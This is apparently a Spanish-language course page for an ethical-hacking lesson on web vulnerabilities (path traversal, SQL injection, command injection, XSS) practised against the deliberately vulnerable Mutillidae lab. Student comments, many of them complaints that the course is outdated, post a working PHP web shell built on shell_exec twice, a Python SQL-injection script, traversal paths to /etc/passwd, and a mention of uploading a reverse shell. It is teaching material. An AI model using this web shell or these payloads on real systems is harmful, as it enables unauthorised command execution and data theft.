Explotación de Vulnerabilidades en Aplicaciones Web

Resumen

Las vulnerabilidades en sistemas informáticos representan una de las principales preocupaciones en el ámbito de la ciberseguridad. Descubrir y comprender estas debilidades son pasos cruciales para desarrollar sistemas más robustos y seguros. En el curso de hoy, hemos abordado cómo identificar y explotar ciertas debilidades en una herramienta específica, utilizando para ello técnicas y métodos que deberían ser conocidos por todos los desarrolladores y expertos en seguridad informática. Nuestro enfoque se centra en la acción directa sobre estas vulnerabilidades para entender mejor su funcionamiento y cómo mitigarlas.

¿Cómo identificar y explotar vulnerabilidades de directorio transversal?

El problema de directorio transversal, también conocido como Path Traversal, permite a los atacantes acceder a archivos y directorios que están almacenados fuera del directorio raíz del servidor web. Para identificar esta vulnerabilidad:

Se accede a la URL perteneciente al servidor vulnerable.
Se modifica la petición enviada por el navegador para navegar a través de los directorios utilizando el patrón "../" (dot dot slash).
Se intenta acceder a archivos críticos, como /etc/passwd, que contiene los usuarios del sistema.

¿Qué es la inyección SQL y cómo podemos prevenirla?

La inyección SQL es una técnica de ataque que altera las consultas a una base de datos para manipular o extraer información sin autorización. Para llevar a cabo una inyección SQL se utiliza lo siguiente:

Entradas maliciosas en campos de formulario que interfieren con la consulta SQL del servidor.
Se prueban inyecciones como " ' OR '1'='1" para burlar las autenticaciones o extraer información sensible.
Los desarrolladores deben implementar métodos de validación y saneamiento de entradas para prevenir este tipo de ataques.

¿Cómo utilizar la inyección de comandos para acceder a información del sistema?

La inyección de comandos permite ejecutar comandos arbitrarios en el servidor debido a una validación inadecuada del input del usuario. Para realizar una inyección de comandos:

Se identifica una entrada en la que el sistema toma como parte de un comando los datos proporcionados por el usuario.
Se ingresan comandos del sistema operativo en estas entradas, como ls para listar directorios o cat para leer archivos.

¿Cuál es la diferencia entre Cross-site scripting (XSS) reflejado y persistente?

El Cross-site scripting, o XSS, es un tipo de vulnerabilidad que permite a un atacante inyectar código malicioso en una página web. Existen dos tipos principales:

XSS reflejado: Se ejecuta el código malicioso como resultado de una petición del navegador, y el efecto es temporal.
XSS persistente: El código malicioso se almacena en el servidor y afecta a la página web de manera permanente, pudiendo afectar a múltiples usuarios.

Los atacantes pueden utilizar estas técnicas para robar cookies de sesión o mostrar contenido no deseado.

¿Cómo crear y subir un script PHP vulnerable como práctica de aprendizaje?

Como parte del aprendizaje sobre vulnerabilidades, podemos crear scripts PHP con propósito educativo que contengan vulnerabilidades intencionadas. Para ello:

Se escribe un simple formulario en PHP que envíe comandos al servidor.
Se sube este archivo a un servidor vulnerable para probar la ejecución de comandos.
Esta práctica permite entender cómo proteger aplicaciones contra la ejecución no autorizada de código.

La exploración y explotación de vulnerabilidades es una habilidad esencial en el mundo de la ciberseguridad. Mediante la práctica y el estudio continuo, puedes mejorar tus habilidades y contribuir a la creación de aplicaciones y sistemas más seguros. ¡Continúa aprendiendo y perfeccionando tus conocimientos en este emocionante campo!

Gilberto Marcano

student•

WEB SHELL
<form action="" method="POST" enctype="application/x-www-form-urlencoded">
    <table style="margin-left: auto; margin-right: auto">
        <tr>
            <td colspan="2" style="text-align: center; font-weight: bold; color: #770000;">
                Inserta el comando requerido
            </td>
        </tr>
        <tr><td>&nbsp;</td></tr>
        <tr>
            <td style="font-weight: bold;">Comando</td>
            <td><input type="text" name="pCommand" size=""></td>
        </tr>
        <tr><td>&nbsp;</td></tr>
        <tr>
            <td colspan="2" style="text-align: center;">
                <input type="submit" value="Ejecutar Comando">
            </td>
        </tr>
    </table>
</form>
<?php 
    if (isset($_REQUEST["pCommand"])) {
        echo "<pre>";
        echo shell_exec($_REQUEST["pCommand"]);
        echo "</pre>";
    }
?>

Javier Escudero

student•

graciass !

Javier Escudero

student•

Tenes unos errores de espacios:

Quedaria así

WEB SHELL
<form action=""method="POST"enctype="application/x-www-form-urlencoded">
    <table style="margin-left: auto; margin-right: auto">
        <tr>
            <td colspan="2" style="text-align: center; font-weight: bold; color: #770000;">
                Inserta el comando requerido
            </td>
        </tr>
        <tr><td>&nbsp;</td></tr>
        <tr>
            <td style="font-weight: bold;">Comando</td>
            <td><input type="text"name="pCommand"size=""></td>
        </tr>
        <tr><td>&nbsp;</td></tr>
        <tr>
            <td colspan="2"style="text-align: center;">
                <input type="submit"value="Ejecutar Comando">
            </td>
        </tr>
    </table>
</form>
<?php
    if (isset($_REQUEST["pCommand"])) {
        echo"<pre>";
        echo shell_exec($_REQUEST["pCommand"]);
        echo"</pre>";
    }
?>```

Martin Frias Velazco

student•

El archivo a buscar en la práctica del minuto 1, es el archivo "passwd" no "password".

Benjamin Allen Ramirez Horna

student•

1 de 10 la clase

José Antonio Ruiz Cruz

student•

En el primer ejercicio también pueden poner lo siguiente:

http:/<ip>/mutillidae/index.php?page=/etc/passwd

Con el fin de que no pongan tanto "../..".

John Fernando Arenas

student•

Genial, gracias.

Pablo Ezequiel Agüero

student•

NO DEFINITIVAMENTE NO PUEDO CONTINUAR. MUCHOS ERROS, MUCHOS CORTES DE EDICION EN LAS CLASES DONDE QUIZAS SE MUESTREN MUCHOS DE LOS ERRORES QUE VEO QUE LA MAYORIA DE LOS COMPAÑEROS MENCIONAN. PARA EVITAR ESO INSTALLE LAS MISMAS VERSIONES DE TODAS LAS IMAGENES DE SISTEMA PARA LAS DISTINTAS MAQUINAS VIRTUALES SOLO PUDE INSTALAR BIEN KALI, Metaesplotaible 3 UN DESASTRE CON UNA GUIA QUE NO SE ENTIENDE PARA ALGUIEN COMO YO QUE RECIEN EMPIEZA DE 0 REALMETE. NO ENTIENDO SI ES UNA MAQUINA VIRTUAL NUEVA, SERIA LA MIA PERSONAL LA VERDAD. MULTILLIDAE TAMBIEN MUCHOS ERROES AL CONFIGURARLA Y AL QUERER HACER LO DE ESTA CLASE ME PARECEN MUCHOS MENSAJES DE ERROR. NUNCA ME QUERIDO QUEJAR CON LAS COSAS A MEJORAR PERO REALMENTE EN ESTOS CURSOS QUE EMPECE MUY EMOCIONADO ME TERMINO DESEPCIONANDO. GRACIAS ME QUEDE EN LA CLASE 6 Y NO PUDE SEGUIR ME ARRUINO LA RAMA Y NO SE SI SEGUIR LAS DEMAS.

Elvin Alexis Celedonio Ozuna

student•

Platzi este curso esta superdesactualizado no se pueden instalar los laboratorios y por eso no se entiende nada. por favor actualicen esto urgente.

Deberian de dar la opcion de elegir entre varios cursos de los mismo pero mejor elaborados.

Julian Alejandro Pulido

student•

opino lo mismo, deberían rehacer este curso con las herramientas que hay ahora, la tecnología avanza y cambia y con ello cosas de este curso se quedaron obsoletas.

Arturo Francesco Negreiros Samanez

student•

Les comparto mi implementación en Python <3.

#!/usr/bin/python3

import requests
from pprint import pprint

BASE_URL="<mutillidae ip>"


def main(**kwargs):
    username = kwargs["username"]
    password = kwargs["password"]
    
    base_url = f"""{BASE_URL}/mutillidae/index.php?page=user-info.php&username={str(username)}&password={str(password)}&user-info-php-submit-button=View+Account+Details"""
    print(base_url)
    res = requests.get(base_url)
    pprint(res.text)


if __name__ == "__main__":
    main(username= "' or '1' = '1",password= "' or '1' = '1")

Gabriel Corilloclla

student•

capooo deberias poner un tutorial de proyecto explicando toda logica

Juan Rodolfo Castillero Calderon

student•

Porque al ejecutar el ' or 1=1 -- me manda es esto ?

DAVID EDUARDO BAEZ SANCHEZ

student•

Esto puede solucionar el inconveninte. Error 1524

Geiner Jimenez Villegas

student•

Pudiste solucionar el problema?

Rodrigo Leonel Radatti

student•

cuando hago 192.168.2.3/mutillidae/index.php?page=../../../../etc/passwd (con mi respectivo ip) me sale **VALIDATION ERROR: 404 PAGE NOT FOUND ** alguna respuesta a como solucionarlo?

Andres Torres

student•

Intenta buscar como se llama el directorio de contraseñas dentro del directorio etc en la máquina virtual de Ubuntu. En mi caso es passwd

Antonio González

student•

bueno, veo que usas .../.../ (es decir, 3 puntos diagonal), inténtalo con ../../ (es decir, 2 puntos diagonal)..

John Fernando Arenas

student•

La verdad está terrible el curso, creo que buscaré el tema en otro lugar.

Juan Sebastian Arbona Galeano

student•

la verdad es que si demasiado engorroso installar el mutillidae, la version del video esta desactualizada

Juan Emmanuel Díaz

student•

También toma la raíz como "/", es decir no es necesario agregar ../../..... con indicar que arranque desde la raíz esta =/etc/passwd.
El ejemplo del sql injenction si lo colocan mal, se muestra toda la query del sql, pueden agregar tambien => 'or '1'='1

Julian Alejandro Pulido

student•

Porfavor actualizen este curso, algunas cosas no son iguales ahora en 2025 y se me hace insostenible seguir con este curso con videos tan obsoletos

Rodrigo Abel Andrade flores

student•

una consulta me pasa algo raro uso el wifi tpliink v1 y da normal pero cuando entro a virtualbox kali linux o otra maquina virtual se desconecta de mi maquina principal y solo tengo internet en la maquina virtual ejemplo solo en kali linux

Alan Joaquín Baeza Meza

teacher•

Que tal Rodrigo, puedes mandar captura de la configuración de red de tu máquina virtual de favor.

Emmanuel Wolosewicz

student•

voy x la clase 10 y me cuesta un Peru seguirle le ritmo.. saca comandos y lso interpreta como si ya estuvieramos avanzados.. sinceramente me trabe.. me voy a intentar via tutoriales de youtube o algo xq empieza lo mas bien pero no explica los comandos.. como vienen q funcion cumple.. ( te manda de un lugar a otro , o soy yo el del problema o no se) pero de todos los cursos q estoy aprendiendo docker, python . este no entiendo nada!.. xq pone comandos y no explica el que.. o como. no te queda otra q pausar y ver q "**** esta haciendo.

juan CORSI

student•

buenas como estas? primero que nada tranquilo tomalo con calma trata de seguir las rutas de seguridad informatica,anda de lo menor a mayor

no es muy complicado el tema que explica,trata de andar a fundamentos primero,luego anda a linux y tranquilo esto es practica no pasa nada .cualquier cosa si precisas una mano me avisas no tengo drama

Meza Ronaldo

student•

Para los que no entienden la diferencia entre path traversal e RFI Y LFI, pues que la de arriba solo sirve para leer archivos y dos de abajo, puede ejectuar codigo, subir shell etc. Comento esto porque ami en un principio me confundan, Pero estas tecnicas van de la mano.

Rodrigo Corozo Salazar

student•

Muy interesante, la verdad. El hecho de que la teoría y la práctica se den dentro de la misma clase, bajo mi punto de vista, refuerza mucho el aprendizaje.

Fabricio Escalante Pérez

student•

En la parte de subir un archivo también se puede utilizar para subir un script de php que haga una conexión del tipo reverse shell y conseguir acceso remoto con netcat.

Erick González

student•

‘ or 1=1 —

Carlos Alberto Montoya Caicedo

company_admin•

CURSO DESACTUALIZADOOOOOOOOOO, MAL IMPLEMENTADO, ENFOCADO, CERO AYUDA AL ESTUDIANTE, NUNCA PARES DE APRENDER?????

Ps no se puede hacer nada con estos cursos, solo parar de aprender, ya que lógicamente estamos en el curso para aprender y se vuelve tedioso

Gustavo Alejandro Moreno Munevar

student•

Dices que es tedioso pero así funciona el mundo de la tecnología, todo es prueba y error, por más que busques cursos en otro lado te va a pasar siempre lo mismo, puede que no con este tema en particular pero si con otro, ahora bien hasta el momento yo he podido aplicar todo el curso, incluyendo el laboratorio de este video, si necesitas ayuda no dudes en escribir.

Carlos Alberto Montoya Caicedo

company_admin•

Gustavo te recomiendo Academia de Ciberseguridad, para que comprendas lo que estoy expresando, sin embargo, tiene razón en lo que dices, pero no en todas las academias sucede el que no se actualice el contenido.

Juan Martínez

student•

La ciberseguridad ha cambiado mucho en 7 años.

Julian Alejandro Pulido

student•

Este curso está desactualizado, en la clase anterior no pude instalar el mutillidae como lo muestran en el video, porfavor actualizen el curso

Cesar Armando Castillo Rosas

student•

hey que onda, igual llevo muy poco con este curso y logre instalar mutillidae y montar el servidor, puse un comentario en esa clase de la instalación, ve a la seccion de comentarios y filtras por nuevos y ahi deberia aparecer se tiene que descargar la version antigua de ubuntu server con la que el profesor instalo y monto su servidor de mutillidae si gustas ayuda me pudes comentar aqui mismo y te puedo tratar de resolver un saludo y animo

Julian Alejandro Pulido

student•

Buenas, Pues revise tu comentario y lo instale en la versión que dijiste "Ubuntu 18.04.6 LTS (Bionic Beaver)", Aunque si pude ejecutar los comandos y no tuve tantos problemas, al final obtuve un resultado diferente al del profesor.

Te comento para que le eches un vistazo y mires si puedes solucionar este problema:

Explotación de Vulnerabilidades en Aplicaciones Web

Bienvenida y panorama general

Seguridad Informática y Ética en el Hacking

Panorama General de la Seguridad Informática y sus Principales Amenazas

Gestión y Clasificación de Vulnerabilidades en Sistemas Informáticos

Amenazas y Ataques Cibernéticos: Conceptos y Tipos Comunes

Instalación de Kali Linux y configuración de entorno de pruebas

Instalación y configuración de máquinas virtuales vulnerables en Linux

Instalación y Configuración de Packer, Vagrant y Git en Windows

Explotación de Vulnerabilidades en Aplicaciones Web

Introducción al Hacking Ético

Diseño de Experiencias de Usuario en Aplicaciones Móviles

Ética y Hacking Ético: Fundamentos y Aplicaciones

Búsqueda Avanzada de Información en Fuentes Abiertas

Uso de Herramientas de Hacking para Resolución de Retos Cibernéticos

Fundamentos del Ethical Hacking y Certificaciones Internacionales

Pentesting

Prueba de seguridad: conceptos, importancia y recomendaciones

Pruebas de Seguridad: Tipos y Fases Esenciales

Búsqueda de Claves Secretas en Repositorios Git con Kali Linux

Escaneo de Redes y Puertos con Nmap en Kali Linux

Escaneo de Redes con Nmap en Kali Linux

Resolución de retos con herramientas de seguridad web

Explotación de Vulnerabilidades en Sistemas con Nexus y Metasploit

Explotación de Vulnerabilidades con Elasticsearch y Ibombshell

Estándares y aspectos legales

Estándares y Legislación en Seguridad de la Información

Contratos Informáticos: Tipos y Elementos Esenciales

Ciberdelitos y Convenio de Budapest: Estrategias de Persecución

Casos típicos de ataques

Análisis Estático de Malware: Herramientas y Técnicas Básicas

Análisis Dinámico de Malware: Uso de Herramientas y Técnicas Básicas

ARP Spoofing: Ataques y Protección en Redes TCP/IP

Ataques de Hombre en el Medio: Conceptos y Ejecución Práctica

Ataques de Denegación de Servicio: Uso de LOIC y HOIC

Ingeniería Social: Técnicas y Uso de Social Finish

Controles y mecanismos de seguridad

Políticas de Seguridad y Controles de Acceso en Empresas

Resolución de Retos de Seguridad en San Holidays Challenge

Copias de Seguridad: Tipos, Estrategias y Protección de Datos

Instalación y configuración de IDS con Snort en Linux

Gestión de Riesgos y Modelado de Amenazas en Seguridad Informática